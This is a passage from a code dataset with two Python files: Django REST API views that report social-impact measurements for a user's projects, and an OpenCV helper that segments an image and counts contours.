BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None):\n projects = Project.objects.filter(created_by=request.user).order_by('-start_date')\n sior_measurements = SIORMeasurement.objects.filter(created_by=request.user)\n projects_with_impact = [measurement.project.id for measurement in sior_measurements.distinct('project')]\n table_impact, table_no_impact = [], []\n for project in projects:\n coordinador = f\"{project.coordinator} ({project.coordinator_country})\"\n dict_row = {\n 'id': project.id,\n 'name': project.name,\n 'description': project.description,\n 'status': project.get_status_display(),\n 'start_date': project.start_date.strftime(\"%d/%m/%Y\"),\n 'end_date': project.end_date.strftime(\"%d/%m/%Y\"),\n 'coordinator': coordinador\n }\n if project.id in projects_with_impact:\n project_impacts = sior_measurements.filter(project=project)\n impact_targets, impact_scores = [], []\n for project_impact in project_impacts:\n impact_targets.append(project_impact.get_sdg_display())\n impact_scores.append(project_impact.score)\n dict_row['impact_targets'] = impact_targets\n dict_row['impact_scores'] = impact_scores\n table_impact.append(dict_row)\n else:\n table_no_impact.append(dict_row)\n response = {'body_impact': table_impact,\n 'body_no_impact': table_no_impact}\n return Response(response)\n\n\nclass ProjectImpactOverall(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None, **kwargs):\n project_id = kwargs.get('id')\n project_impacts = SIORMeasurement.objects.filter(created_by=request.user, project__id=project_id)\n targets, scores = [], []\n for project_impact in project_impacts:\n targets.append(project_impact.get_sdg_display())\n scores.append(int(project_impact.score))\n response = {\n 'name': project_impacts[0].project.name,\n 'start_date': project_impacts[0].project.start_date.strftime(\"%d/%m/%Y\"),\n 'end_date': project_impacts[0].project.end_date.strftime(\"%d/%m/%Y\"),\n 'targets': ' '.join(targets),\n 'overall_score': max(scores)\n }\n return Response(response)\n\n\nclass ProjectImpactDetails(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None, **kwargs):\n project_id = kwargs.get('id')\n project_impacts = SIORMeasurement.objects.filter(created_by=request.user, project__id=project_id)\n impacts = []\n for project_impact in project_impacts:\n file_url = '/'.join(project_impact.evidence.publication.file.url.split('/')[1:])\n dict_url = settings.MEDIA_URL + '/'.join(project_impact.evidence.search.dictionary.url.split('/')[1:])\n impact_dict = {\n 'evidence': {\n 'name': project_impact.evidence.publication.name,\n 'page': project_impact.evidence.page,\n 'sentence': project_impact.evidence.sentence,\n 'impact_keywords': project_impact.evidence.impact_mention,\n 'is_scientific': str(project_impact.scientific_evidence),\n 'file': file_url\n },\n 'social_target': project_impact.get_sdg_display(),\n 'percentage_improvement': project_impact.percentage_improvement,\n 'description_achievement': project_impact.description_achievement,\n 'sustainability': project_impact.sustainability,\n 'description_sustainability': project_impact.description_sustainability,\n 'replicability': project_impact.replicability,\n 'description_replicability': project_impact.description_replicability,\n 'score': project_impact.score,\n 'dictionary': dict_url\n }\n impacts.append(impact_dict)\n docs = Publication.objects.filter(created_by=request.user, project_id=project_id)\n project_reports = []\n for doc in docs:\n for impact in impacts:\n if doc.name != impact['evidence']['name']:\n doc_url = '/'.join(doc.file.url.split('/')[1:])\n project_reports.append({'name': doc.name, 'url': doc_url})\n response = {\n 'impacts': impacts,\n 'docs': project_reports\n }\n return Response(response)","repo_name":"social-link-analytics-group-bsc/impact-app","sub_path":"backend/social_impact/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22184953021","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef get_indicator(\n img: '(np.array ==> gray scale image) white is for B-lite. black is for others',\n kernel_size: '(int or tuple[int, int]) size of the blur filter (in this case mean filter) Ex. 3 means using a 3x3 mean filter'=41,\n ratio: '(float) betweeen 0. to 1. ==> the threshold used after mean filtering'=0.25,\n area_thres: '(tuple[int, int]) ignore all areas which is not inside this range'=(200, 3000)\n):\n img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, np.ones((5,5),np.uint8))\n blur = cv2.blur(img, kernel_size)\n # remove padding\n blur = np.copy(blur[kernel_size[0]//2 + 1: -kernel_size[0]//2 + 1,kernel_size[1]//2 + 1: -(kernel_size[1]//2) + 1])\n thresh = int(ratio*255)\n _, out = cv2.threshold(blur, thresh, 255, cv2.THRESH_BINARY)\n\n contours, hierarchy = cv2.findContours(np.uint8(out), cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n tmp_area = {}\n\n try:\n if hierarchy == None:\n return 0, 0, 0\n except:\n for ind, tmp_hi in enumerate(hierarchy[0]):\n if tmp_hi[3] == -1:\n tmp_area[ind] = cv2.contourArea(contours[ind])\n for ind, tmp_hi in enumerate(hierarchy[0]):\n if tmp_hi[3] != -1:\n tmp_area[tmp_hi[3]] -= cv2.contourArea(contours[ind])\n tmp_area = [tmp_area[area_id] for area_id in tmp_area if area_thres[1] > tmp_area[area_id] > area_thres[0]]\n plt.hist(tmp_area, 50)\n plt.show()\n N = len(tmp_area)\n\n percentage = np.sum(out/255)/(out.shape[0]*out.shape[1])\n print(f'Number of contours: {N}')\n print(f'Percentage( % ): {100*percentage}')\n print(f'Index: {percentage*N}')\n return N, 100*percentage, percentage*N","repo_name":"Kamin-At/Image_segmentation","sub_path":"segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}